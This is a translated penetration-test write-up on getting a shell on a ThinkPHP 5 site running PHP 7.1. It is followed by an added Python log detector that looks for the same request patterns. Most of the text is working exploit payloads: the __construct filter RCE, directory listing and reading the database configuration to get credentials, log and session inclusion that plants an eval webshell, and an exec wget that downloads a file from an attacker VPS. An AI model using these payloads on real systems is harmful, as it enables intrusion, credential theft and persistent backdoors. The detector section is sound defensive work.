
Title: Testing getshell methods on a tp5 website in a real-world engagement


0x00 Introduction

I had encountered few tp5 sites before, and only knew how to getshell through the RCE vulnerability. In a recent penetration test of a card-issuing platform, the PHP version made it impossible to get a shell directly with the RCE payload. So, working with that site, I tested as many getshell methods as possible in a tp5 + PHP 7.1 environment.

0x02 Main text

After receiving the target, I visited the homepage [screenshot]

During testing I found it was a ThinkPHP site; the error page looked like this [screenshot]

However, the exact version is not visible and I was not sure whether RCE existed, so I tried it with an exp:

_method=__constructmethod=getfilter=call_user_funcget[]=phpinfo


It executed successfully, and many functions are disabled through disable_functions [screenshot]

Generally, if the PHP version is lower than 7.1, you can simply use the exp to write a shell. The method is to write the shell directly with the following exp:

s=file_put_contents('test.php','?php phpinfo();')_method=__constructmethod=POSTfilter[]=assert

However, this exp uses assert, and phpinfo above shows that the PHP version is 7.1.33. assert can no longer be used this way on that version, so this method does not work here.

The exp of Method 2 above cannot write a shell, but phpinfo does execute, so RCE exists. So I thought I could read the database account and password by reading files, then look for phpmyadmin, and then write a shell through the database.

So first find the website root directory from the information in phpinfo, then use the scandir function to list the directories and find the database configuration file:

_method=__constructfilter[]=scandirfilter[]=var_dumpmethod=GETget[]=path


Then read the file with the highlight_file function:

_method=__constructfilter[]=highlight_filemethod=GETget[]=read file path


After getting the database information, I checked whether phpmyadmin existed and found that it did not, so this method also failed.

Searching the forum for tp5 getshell methods, I found many experts saying that log inclusion or session inclusion can be used, but I had never come across them and did not know the specifics, so I looked them up and tried them.

Method 3: try log inclusion

First write the shell into the log:

_method=__constructmethod=getfilter[]=call_user_funcserver[]=phpinfoget[]=?php eval($_POST['c'])?

Then getshell by including the log:

_method=__constructmethod=getfilter[]=think\__include_fileserver[]=phpinfoget[]=./data/runtime/log/202110/17.logc=phpinfo();


Failed; the log inclusion method is not usable here.

Method 4: try getshell via session inclusion

First, set a session and pass in a one-line webshell:

_method=__constructfilter[]=think\Session:setmethod=getget[]=?php eval($_POST['c'])?server[]=1


Then include the session file directly. The tp5 session file is usually under /tmp, and the file name is session_sessionid (the session id is in the cookie):

_method=__constructmethod=getfilter[]=think\__include_fileserver[]=phpinfoget[]=/tmp/sess_ejc3iali7uv3deo9g6ha8pbtoic=phpinfo();


Executed successfully; then connect to it with AntSword [screenshot]

getshell succeeded [screenshot]

www permissions [screenshot]

I had already got the shell with Method 5, but I still tried whether there were other methods that could getshell. I had seen an article where exec was not disabled in disable_functions, and exec was then used to download the shell file from a VPS.

So I looked carefully at the functions listed in disable_functions and, as it happened, found that exec was not disabled here either, so I tried it.

First create a test.php on the VPS and open a port with Python:

python -m SimpleHTTPServer 8888


Download the file from the VPS:

s=wget vps/test.php_method=__constructmethod=getfilter[]=exec


Successfully downloaded to the target machine.

0x03 Summary

1. Entering a wrong path on the target website shows a ThinkPHP error page, but the version is not displayed.

2. Sending the tp5.x RCE poc shows phpinfo successfully; disable_functions disables many functions and the PHP version is 7.1.x.

http://www.xxx.com/index.php?s=captcha

post:

_method=__constructmethod=getfilter=call_user_funcget[]=phpinfo

3. The following methods can obtain a shell directly (tp5.x + php7.1.x)

Method 1: (requires a PHP version lower than 7.1)

http://www.xxx.com/index.php?s=captcha

post:

s=file_put_contents('test.php','?php phpinfo();')_method=__constructmethod=POSTfilter[]=assert(

Method 2: (tp5.x+php7.1.x)

First, find the website root directory from the information in phpinfo, then use the scandir function to list the directories and find the database configuration file:

_method=__constructmethod=getfilter=call_user_funcget[]=phpinfo

This shows that the website directory is /www/wwwroot/idj/. Listing directories from that root shows that the configuration directory (/www/wwwroot/idj/data/conf) contains database.php, which holds the database connection.

_method=__constructfilter[]=scandirfilter[]=var_dumpmethod=GETget[]=/www/wwwroot/

_method=__constructfilter[]=scandirfilter[]=var_dumpmethod=GETget[]=/www/wwwroot/idj/

_method=__constructfilter[]=scandirfilter[]=var_dumpmethod=GETget[]=/www/wwwroot/idj/data/

_method=__constructfilter[]=scandirfilter[]=var_dumpmethod=GETget[]=/www/wwwroot/idj/data/conf

Then read the file with the highlight_file function and obtain the username and password for the database connection:

_method=__constructfilter[]=highlight_filemethod=GETget[]=/www/wwwroot/idj/data/conf/database.php

If the website has phpmyadmin, you can log in with the database user and password and write a shell through the mysql log.

Method 3: (tp5.x + php7.1.x, log inclusion)

First write the shell into the log:

_method=__constructmethod=getfilter[]=call_user_funcserver[]=phpinfoget[]=?php eval($_POST['c'])?

Then getshell by including the log:

_method=__constructmethod=getfilter[]=think\__include_fileserver[]=phpinfoget[]=./data/runtime/log/202110/17.logc=phpinfo();

Method 4: (tp5.x + php7.1.x, getshell via session inclusion)

First, set a session and pass in a one-line webshell:

_method=__constructfilter[]=think\Session:setmethod=getget[]=?php eval($_POST['c'])?server[]=1

Then include the session file directly. The tp5 session file is usually under /tmp, and the file name is session_sessionid (the session id is in the cookie):

_method=__constructmethod=getfilter[]=think\__include_fileserver[]=phpinfoget[]=/tmp/sess_ejc3iali7uv3deo9g6ha8pbtoic=phpinfo();

Method 5: (tp5.x + php7.1.x, exec is not disabled in disable_functions)

First create a test.php on the VPS and open a port with Python:

python -m SimpleHTTPServer 8888

Download the file from the VPS:

s=wget http://www.vps.com/test.php_method=__constructmethod=getfilter[]=exec
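Every method in the walkthrough and in the summary above shares the same request shape: `_method=__construct` to reach the constructor, a `filter` parameter naming a callable, and (for Methods 3 and 4) `think\__include_file` pointed at the runtime log or a `/tmp/sess_*` file. From the defender's side that shape is what to hunt for in request logs. The detector below is an added example written for this page, not code from the original post or from ThinkPHP; the log format (`<client-ip> <verb> <path> <query-or-body>`), the IP addresses, the session id and the benign requests are constructed assumptions, so the parser will need adapting to a real server's log format.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample records in an assumed "<client-ip> <verb> <path> <query-or-body>"
# format, one request per line. The suspicious bodies mirror the parameter shapes in
# the write-up; the IPs, the session id and the ordinary requests are made up.
SAMPLE_LOG = r"""
10.0.0.5 GET /index.php s=index/index
10.0.0.7 POST /index.php?s=user/login username=alice&password=secret
10.0.0.9 POST /index.php?s=captcha _method=__construct&method=get&filter=call_user_func&get[]=phpinfo
10.0.0.9 POST /index.php?s=captcha _method=__construct&filter[]=scandir&filter[]=var_dump&method=GET&get[]=/www/wwwroot/
10.0.0.9 POST /index.php?s=captcha _method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/tmp/sess_abc123&c=phpinfo();
""".strip()

# Callables that appear as `filter` values in the write-up's requests. Any of them as a
# filter value is a strong indicator on its own, regardless of what disable_functions says.
FILTER_CALLABLES = {"call_user_func", "assert", "exec", "scandir", "highlight_file", "file_put_contents"}
INCLUDE_FILTER = "think\\__include_file"
# Include targets used in the write-up: the framework's runtime log and the PHP session file.
SENSITIVE_INCLUDE = re.compile(r"(runtime/log/|/tmp/sess_)")

LOG_RE = re.compile(r"^(?P<ip>\S+) (?P<verb>[A-Z]+) (?P<path>\S+)(?: (?P<params>.*))?$")


def parse_record(line):
    """Split one log line into ip/verb/path plus a decoded list of (key, value) parameters."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["params"] = parse_qsl(rec["params"] or "", keep_blank_values=True)
    return rec


def classify(rec):
    """Return the list of indicator tags that fire on one parsed record (empty if clean)."""
    tags = []
    params = rec["params"]
    if ("_method", "__construct") in params:
        tags.append("method-override-to-constructor")
    filters = [v for k, v in params if k in ("filter", "filter[]")]
    for f in filters:
        if f in FILTER_CALLABLES:
            tags.append("filter-callable:" + f)
    if INCLUDE_FILTER in filters:
        tags.append("filter-include-file")
        # The included path travels in get[]; flag it when it points at a log or session file.
        for k, v in params:
            if k == "get[]" and SENSITIVE_INCLUDE.search(v):
                tags.append("include-target:" + v)
    return tags


def scan(log_text):
    """Return [(ip, path, tags)] for every record on which at least one indicator fires."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            hits.append((rec["ip"], rec["path"], tags))
    return hits


if __name__ == "__main__":
    for ip, path, tags in scan(SAMPLE_LOG):
        print(ip, path, ", ".join(tags))
```

Matching on the parameter structure rather than on a literal payload string is deliberate: the write-up shows the same `_method=__construct` + `filter` skeleton carrying five different callables, so a detector keyed on `phpinfo` or `assert` alone would miss the scandir, highlight_file and exec variants. The `include-target` tag is the one to escalate first, because a hit there means the application was also asked to include a file the attacker can write to.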

Original link: https://xz.aliyun.com/t/10397
